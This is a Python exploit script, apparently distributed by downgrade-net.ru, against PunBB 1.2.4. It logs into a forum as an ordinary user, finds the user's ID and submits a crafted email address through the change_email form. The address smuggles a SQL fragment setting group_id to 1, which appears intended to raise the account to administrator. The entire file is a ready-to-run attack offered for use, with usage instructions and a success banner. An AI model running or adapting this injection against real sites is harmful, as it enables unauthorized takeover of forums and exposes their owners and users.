#!/usr/bin/env python3 import requests import sys import re from urllib.parse import urljoin class Colors: GREEN = '\033[92m' BLUE = '\033[94m' YELLOW = '\033[93m' RED = '\033[91m' BOLD = '\033[1m' CYAN = '\033[96m' RESET = '\033[0m' def banner(): print(Colors.BOLD + Colors.CYAN + """ ╔══════════════════════════════════════════════════════════════╗ ║ PunBB 1.2.4 - change_email SQL Injection ║ ║ ║ ║ by www.downgrade-net.ru ║ ╚══════════════════════════════════════════════════════════════╝ """ + Colors.RESET) def success(msg): print(Colors.GREEN + "[+] " + msg + Colors.RESET) def info(msg): print(Colors.BLUE + "[*] " + msg + Colors.RESET) def warning(msg): print(Colors.YELLOW + "[!] " + msg + Colors.RESET) def error(msg): print(Colors.RED + "[-] " + msg + Colors.RESET) def main(): banner() if len(sys.argv) < 6: print(f"Usage: python3 {sys.argv[0]} ") print(f"Example: python3 {sys.argv[0]} http://localhost user password user@domain.com domain.com") sys.exit(1) url = sys.argv[1].rstrip('/') username = sys.argv[2] password = sys.argv[3] email = sys.argv[4] domain = sys.argv[5] s = requests.Session() info("Logging in as normal user...") login_data = { 'req_username': username, 'req_password': password, 'form_sent': '1' } r = s.post(urljoin(url, "/login.php?action=in"), data=login_data) if r.status_code != 200 or "punbb_cookie" not in str(r.cookies): error("Login failed!") sys.exit(1) success("Successfully logged in!") info("Extracting user_id...") r = s.get(urljoin(url, "/index.php")) match = re.search(r'profile\.php\?id=(\d+)', r.text) if match: user_id = match.group(1) success(f"User-ID found: {user_id}") else: error("Could not find user_id!") sys.exit(1) info("Creating payload...") payload = f'"{email.split("@")[0]}"@{email.split("@")[1]}","\',' append = "group_id='1" padding = " " * (50 - len(append) - len(payload)) final_email = payload + padding + append + f'"@{domain}' info(f"Payload: {final_email[:70]}...") success("Sending SQL Injection payload...") change_data = { 'req_new_email': final_email, 'form_sent': '1' } r = s.post(urljoin(url, f"/profile.php?action=change_email&id={user_id}"), data=change_data) print(Colors.BOLD + Colors.GREEN + "\n" + "="*65) print(" EXPLOIT FINISHED SUCCESSFULLY!") print("="*65 + Colors.RESET) print(Colors.YELLOW + "Now check your email and click the confirmation link\n" + Colors.RESET) if __name__ == "__main__": try: main() except KeyboardInterrupt: error("Interrupted by user") except Exception as e: error(f"Error: {e}")